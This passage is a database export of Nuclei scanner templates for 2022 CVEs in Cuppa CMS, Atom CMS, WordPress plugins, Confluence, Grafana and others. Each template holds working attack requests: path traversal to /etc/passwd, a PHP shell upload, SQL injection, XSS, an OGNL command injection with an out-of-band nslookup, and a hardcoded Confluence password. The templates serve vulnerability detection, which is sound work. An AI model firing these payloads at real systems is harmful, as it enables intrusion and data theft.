CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n cvss-score: 7.8\n cve-id: CVE-2022-25485\n cwe-id: CWE-829\n epss-score: 0.00648\n epss-percentile: 0.78876\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,lfi,cuppa,cuppacms\n\nhttp:\n - raw:\n - |\n POST /alerts/alertLightbox.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n url=../../../../../../../../../../../etc/passwd\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220695bf0015ba99c93acd63afca4128b2148ff5a27a7932b4643c859aeb61a42c4022044e70aebbbea707f05244a3f7616eaf4faf0449294f9689bcfc0fffc730fb702:922c64590222798bb761d5b6d8e72950", "hash": "2754ee4cd2633b2cb6ed016358ae7d8a", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d9" }, "name": "CVE-2022-25486.yaml", "content": "id: CVE-2022-25486\n\ninfo:\n name: Cuppa CMS v1.0 - Local File Inclusion\n author: theamanrawat\n severity: high\n description: |\n CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n remediation: |\n Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25486\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n cvss-score: 7.8\n cve-id: CVE-2022-25486\n cwe-id: CWE-829\n epss-score: 0.01775\n epss-percentile: 0.8667\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,lfi,cuppa,cuppacms\n\nhttp:\n - raw:\n - |\n POST /alerts/alertConfigField.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n urlConfig=../../../../../../../../../etc/passwd\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d9af1a8a2a7a6a3c65fffdd36d187033e9d8f9359c5ba7fbdf1c7e7522ab3a7c02200b66649c50c196fe79d3fd5010175cc3440562f4bb473c24296993c71c05f7d4:922c64590222798bb761d5b6d8e72950", "hash": "6c56aaf1894fd3ec0fcf3f46bac573ef", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084da" }, "name": "CVE-2022-25487.yaml", "content": "id: CVE-2022-25487\n\ninfo:\n name: Atom CMS v2.0 - Remote Code Execution\n author: theamanrawat\n severity: critical\n description: |\n Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: Fixed in version Atom CMS v2.1\n reference:\n - https://packetstormsecurity.com/files/166532/Atom-CMS-1.0.2-Shell-Upload.html\n - https://github.com/thedigicraft/Atom.CMS/issues/256\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25487\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-25487\n cwe-id: CWE-434\n epss-score: 0.84615\n epss-percentile: 0.98422\n cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: thedigitalcraft\n product: atomcms\n tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft\n\nhttp:\n - raw:\n - |\n POST /admin/uploads.php?id=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041\n\n -----------------------------30623082103363803402542706041\n Content-Disposition: form-data; name=\"file\"\n\n\n -----------------------------30623082103363803402542706041\n Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n Content-Type: image/jpeg\n\n\n <?php echo md5('CVE-2022-25487');?>\n -----------------------------30623082103363803402542706041--\n - |\n GET /uploads/{{filename}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 7ee3686858eb89dd68ccf85f0ea03abe\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: filename\n group: 1\n regex:\n - SET avatar = '(.*?)'\n internal: true\n# digest: 490a00463044022000a17e07fb463def6fed5b3cbdb6a2ecc52b4dd96ae6004e74061aa8dc3472d202200f9d0f7a19b2dd96dfed84ebd42d91c53587f4eeecc30d5a532882a5f35f94b1:922c64590222798bb761d5b6d8e72950", "hash": "d43e64b0601bbecee8887ad823c64c75", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084db" }, "name": "CVE-2022-25488.yaml", "content": "id: CVE-2022-25488\n\ninfo:\n name: Atom CMS v2.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Fixed in version Atom CMS v2.1\n reference:\n - https://github.com/thedigicraft/Atom.CMS/issues/257\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25488\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/superlink996/chunqiuyunjingbachang\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-25488\n cwe-id: CWE-89\n epss-score: 0.0161\n epss-percentile: 0.87161\n cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: thedigitalcraft\n product: atomcms\n tags: cve,cve2022,sqli,atom,cms,thedigitalcraft\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/ajax/avatar.php?id=-1+union+select+md5({{num}})%23\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"/{{md5(num)}}\"\n - \"avatar-container\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a73c8ca0b49194b5bc99ad324b86286411cb6049ef9f136a9fe942a263d7510202205b6306efb5f7d90e7308cce0f917fa4153db6c0fefd0f487f526ed0ce2b1ab04:922c64590222798bb761d5b6d8e72950", "hash": "a0e6287d3b85a2a655b77542db99f623", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084dc" }, "name": "CVE-2022-25489.yaml", "content": "id: CVE-2022-25489\n\ninfo:\n name: Atom CMS v2.0 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the \"A\" parameter in /widgets/debug.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: Fixed in version Atom CMS v2.1\n reference:\n - https://github.com/thedigicraft/Atom.CMS/issues/258\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25489\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-25489\n cwe-id: CWE-79\n epss-score: 0.00134\n epss-percentile: 0.47681\n cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: thedigitalcraft\n product: atomcms\n tags: cve,cve2022,xss,atom,cms,thedigitalcraft\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/widgets/debug.php?a=<script>alert(document.domain)</script>\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"<script>alert(document.domain)</script>\"\n - \"Path Array\"\n - \"console-debug\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ba616440a48cd79fed0fbb82c74d5b423c176fb2058b2a6e108042d3b7e3f6860220327a46e6573a290031f738c2c771cfdb4e8d33eafa4d6bacb46ae741a85abac2:922c64590222798bb761d5b6d8e72950", "hash": "bc4ba508b4420187aa2cd5d6ffc5d241", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084dd" }, "name": "CVE-2022-25497.yaml", "content": "id: CVE-2022-25497\n\ninfo:\n name: Cuppa CMS v1.0 - Local File Inclusion\n author: theamanrawat\n severity: medium\n description: |\n CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n remediation: |\n Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25497\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-25497\n cwe-id: CWE-552\n epss-score: 0.00508\n epss-percentile: 0.76089\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,lfi,cuppa,intrusive,cuppacms\n\nhttp:\n - raw:\n - |\n POST /js/filemanager/api/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"from\":\"//../../../../../../../../../../../../../etc/passwd\",\"to\":\"/../{{randstr}}.txt\",\"action\":\"copyFile\"}\n - |\n GET /{{randstr}}.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header_2\n words:\n - text/plain\n\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200e86958e748c94fb8894ce5d8e4ffb93f8142bb6942eda24333c6c89421e8ce00220055ccece3bbea309d872f93ae879a2c5d76a3cac9162862159898803a6a7f9bb:922c64590222798bb761d5b6d8e72950", "hash": "a0628fa9def8f103dc1c5ae9faa8969d", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084de" }, "name": "CVE-2022-2551.yaml", "content": "id: CVE-2022-2551\n\ninfo:\n name: WordPress Duplicator <1.4.7 - Authentication Bypass\n author: LRTK-CODER\n severity: high\n description: |\n WordPress Duplicator plugin before 1.4.7 is susceptible to authentication bypass. The plugin discloses the URL of the backup to unauthenticated visitors accessing the main installer endpoint. If the installer script has been run once by an administrator, this allows download of the full site backup without proper authentication.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized actions on the affected WordPress site.\n remediation: Fixed in version 1.4.7.1.\n reference:\n - https://wpscan.com/vulnerability/f27d753e-861a-4d8d-9b9a-6c99a8a7ebe0\n - https://wordpress.org/plugins/duplicator/\n - https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2551\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2551\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-2551\n cwe-id: CWE-425\n epss-score: 0.72442\n epss-percentile: 0.97997\n cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: snapcreek\n product: duplicator\n framework: wordpress\n google-query: inurl:/backups-dup-lite/dup-installer/\n tags: cve2022,cve,wordpress,wp,wp-plugin,duplicator,wpscan,snapcreek\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1\"\n - \"{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"<a href='../installer.php'>restart this install process</a>\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022058b2345a7931d57a2c005b13d6444c706fd67511a9cfd652adc58a44381d1dd4022100a9b711eeffbbf37010a1f9ac104d9745baab70e7beb8354db4179e48762fd500:922c64590222798bb761d5b6d8e72950", "hash": "39fc7ffee2d13bd7be7f238661aecf8a", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084df" }, "name": "CVE-2022-25568.yaml", "content": "id: CVE-2022-25568\n\ninfo:\n name: MotionEye Config Info Disclosure\n author: DhiyaneshDK\n severity: high\n description: |\n MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured.\n reference:\n - https://www.pizzapower.me/2022/02/17/motioneye-config-info-disclosure/\n - https://github.com/ccrisan/motioneye/issues/2292\n - https://nvd.nist.gov/vuln/detail/cve-2022-25568\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-25568\n cwe-id: CWE-1188\n epss-score: 0.01838\n epss-percentile: 0.86962\n cpe: cpe:2.3:a:motioneye_project:motioneye:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: motioneye_project\n product: motioneye\n shodan-query: html:\"MotionEye\"\n tags: cve,cve2022,motioneye,config,motioneye_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/config/list\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"upload_password\"\n - \"network_password\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c0eb31344ab3448d9fd654d7f0e2b8986db5171ee7fc2614b030cda3446cbcd70220546b8923bf2af5f8e75906a0e4b482a48b43d49e5bd90af2be8c05d0b606f05e:922c64590222798bb761d5b6d8e72950", "hash": "380d17a453407656d42beef491a7fe8c", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e0" }, "name": "CVE-2022-2599.yaml", "content": "id: CVE-2022-2599\n\ninfo:\n name: WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n WordPress Anti-Malware Security and Brute-Force Firewall plugin before 4.21.83 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in an admin dashboard.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the targeted WordPress site, potentially leading to unauthorized access, data theft, or further attacks.\n remediation: |\n Update the WordPress Anti-Malware Security and Brute-Force Firewall plugin to version 4.21.83 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/276a7fc5-3d0d-446d-92cf-20060aecd0ef\n - https://wordpress.org/plugins/gotmls/advanced/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2599\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-2599\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:anti-malware_security_and_brute-force_firewall_project:anti-malware_security_and_brute-force_firewall:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: anti-malware_security_and_brute-force_firewall_project\n product: anti-malware_security_and_brute-force_firewall\n framework: wordpress\n tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"</script><img src onerror=alert(document.domain)>\"\n - \"GOTMLS_mt\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100afd7ffdc412d5cbffebb6acdf1850cbcc2f20ebe9e9b5e56d2573c3e144242fb022100c25d1c6e7cdb06d86355391d4e7fe15b393dc72e717e0c1b998da4bfc729663a:922c64590222798bb761d5b6d8e72950", "hash": "737aea146c9c4fe15bfe0d42164f0c74", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e1" }, "name": "CVE-2022-26134.yaml", "content": "id: CVE-2022-26134\n\ninfo:\n name: Confluence - Remote Code Execution\n author: pdteam,jbertman\n severity: critical\n description: |\n Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches or updates provided by Atlassian to mitigate this vulnerability.\n reference:\n - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis\n - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html\n - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/\n - https://jira.atlassian.com/browse/CONFSERVER-79016\n - http://packetstormsecurity.com/files/167431/Through-The-Wire-CVE-2022-26134-Confluence-Proof-Of-Concept.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-26134\n cwe-id: CWE-917\n epss-score: 0.97528\n epss-percentile: 0.9999\n cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: atlassian\n product: confluence_data_center\n shodan-query: http.component:\"Atlassian Confluence\"\n tags: cve,cve2022,packetstorm,confluence,rce,ognl,oast,kev,atlassian\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/\"\n - \"{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/\"\n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - 'contains(to_lower(header_1), \"x-cmd-response:\")'\n\n - type: dsl\n dsl:\n - 'contains(interactsh_protocol, \"dns\")'\n - 'contains(to_lower(response_2), \"confluence\")'\n condition: and\n\n extractors:\n - type: kval\n kval:\n - \"x_cmd_response\"\n part: header\n# digest: 490a00463044022043923188d8f26d3bad64b5b6194f0d26c0205ef1d053c1e84a0b3122538323a802202d862f6fca847a1e99d6ec7e4b694f266cd8b0409ca139653667b057d5873735:922c64590222798bb761d5b6d8e72950", "hash": "d8395bef8e4dd3de52a414562d299146", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e2" }, "name": "CVE-2022-26138.yaml", "content": "id: CVE-2022-26138\n\ninfo:\n name: Atlassian Questions For Confluence - Hardcoded Credentials\n author: HTTPVoid\n severity: critical\n description: |\n Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Confluence instance.\n remediation: |\n Update the Atlassian Questions For Confluence plugin to the latest version, which removes the hardcoded credentials.\n reference:\n - https://twitter.com/fluepke/status/1549892089181257729\n - https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html\n - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-26138\n - https://jira.atlassian.com/browse/CONFSERVER-79483\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-26138\n cwe-id: CWE-798\n epss-score: 0.97262\n epss-percentile: 0.99834\n cpe: cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: atlassian\n product: questions_for_confluence\n shodan-query: http.component:\"Atlassian Confluence\"\n tags: cve2022,cve,confluence,atlassian,default-login,kev\n\nhttp:\n - raw:\n - |\n POST /dologin.action HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n os_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action\n\n payloads:\n os_username:\n - disabledsystemuser\n os_password:\n - disabled1system1user6708\n attack: pitchfork\n matchers:\n - type: dsl\n dsl:\n - 'location == \"/httpvoid.action\"'\n# digest: 4a0a004730450220422bbf1147e32d7098167fda41b6ebbbab0fb1a33273478a0fe42870a6364d550221009183ec3599722164f7c06a16c6983fbd3faab1b36f05b0913935b8d6339e5f9f:922c64590222798bb761d5b6d8e72950", "hash": "5514028dd66d46334534186a53fbb4c4", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e3" }, "name": "CVE-2022-26148.yaml", "content": "id: CVE-2022-26148\n\ninfo:\n name: Grafana & Zabbix Integration - Credentials Disclosure\n author: Geekby\n severity: critical\n description: |\n Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.\n impact: |\n An attacker can obtain sensitive credentials, leading to unauthorized access and potential data breaches.\n remediation: |\n Update to the latest version of the Grafana & Zabbix Integration plugin to fix the vulnerability.\n reference:\n - https://2k8.org/post-319.html\n - https://security.netapp.com/advisory/ntap-20220425-0005/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-26148\n - https://github.com/HimmelAward/Goby_POC\n - https://github.com/Z0fhack/Goby_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-26148\n cwe-id: CWE-312\n epss-score: 0.15727\n epss-percentile: 0.95795\n cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: grafana\n product: grafana\n shodan-query: title:\"Grafana\"\n fofa-query: app=\"Grafana\"\n tags: cve,cve2022,grafana,zabbix,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login?redirect=%2F\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"zabbix\":'\n - '\"zbx\":'\n - \"alexanderzobnin-zabbix-datasource\"\n condition: or\n\n - type: regex\n part: body\n regex:\n - '\"password\":\"(.*?)\"'\n - '\"username\":\"(.*?)\"'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n group: 1\n regex:\n - '\"password\":\"(.*?)\"'\n - '\"username\":\"(.*?)\"'\n - '\"url\":\"([a-z:/0-9.]+)\\/api_jsonrpc\\.php'\n# digest: 4a0a00473045022100b6eaad94ff3878067cbf35ebf2e98041d29ea00cd548a6acc1cebf8170545ff5022011109ec67dc75367e14a57c39726ee1cd3150458963d5a36b4ea0a51e0b68769:922c64590222798bb761d5b6d8e72950", "hash": "4221a383e84e2b36b2d0047da987589c", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e4" }, "name": "CVE-2022-26159.yaml", "content": "id: CVE-2022-26159\n\ninfo:\n name: Ametys CMS Information Disclosure\n author: Remi Gascou (podalirius)\n severity: medium\n description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.\n impact: |\n The vulnerability can lead to the exposure of sensitive data, such as user credentials or system configuration.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Ametys CMS.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-26159\n - https://podalirius.net/en/cves/2022-26159/\n - https://issues.ametys.org/browse/CMS-10973\n - https://github.com/p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-26159\n cwe-id: CWE-425\n epss-score: 0.00597\n epss-percentile: 0.76107\n cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ametys\n product: ametys\n tags: cve,cve2022,plugin,ametys,cms\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '<auto-completion>'\n - '<item>'\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/xml'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d8276e7109d2bd69d3ea42af14353f15d96864cf72e8e0effcef94a02a2a499b022032467aecf3198c0b7e34fa5664b2c75d91a03e94423d9d3168960d7a55e2bfa7:922c64590222798bb761d5b6d8e72950", "hash": "4f9fd721efdfa628c9f1bd2444fb3440", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e5" }, "name": "CVE-2022-26233.yaml", "content": "id: CVE-2022-26233\n\ninfo:\n name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the \"GET /..\\..\" substring.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability.\n reference:\n - https://0day.today/exploit/37579\n - http://seclists.org/fulldisclosure/2022/Apr/0\n - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-26233\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-26233\n cwe-id: CWE-22\n epss-score: 0.00654\n epss-percentile: 0.77223\n cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: barco\n product: control_room_management_suite\n tags: cve,cve2022,barco,lfi,seclists,packetstorm\n\nhttp:\n - raw:\n - |+\n GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\n Host: {{Hostname}}\n\n unsafe: true\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 4a0a00473045022100daa8547f82c8615b2d03d8541ff37de1f91c24cf042872c4954ab90b80af5a050220345d77954918025528c4ca7435b98169569b646c348d133e3290273d1c16e42d:922c64590222798bb761d5b6d8e72950", "hash": "ae3c2645f081c2c1bba1a10fa7805d71", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e6" }, "name": "CVE-2022-26263.yaml", "content": "id: CVE-2022-26263\n\ninfo:\n name: Yonyou U8 13.0 - Cross-Site Scripting\n author: edoardottt,theamanrawat\n severity: medium\n description: |\n Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the 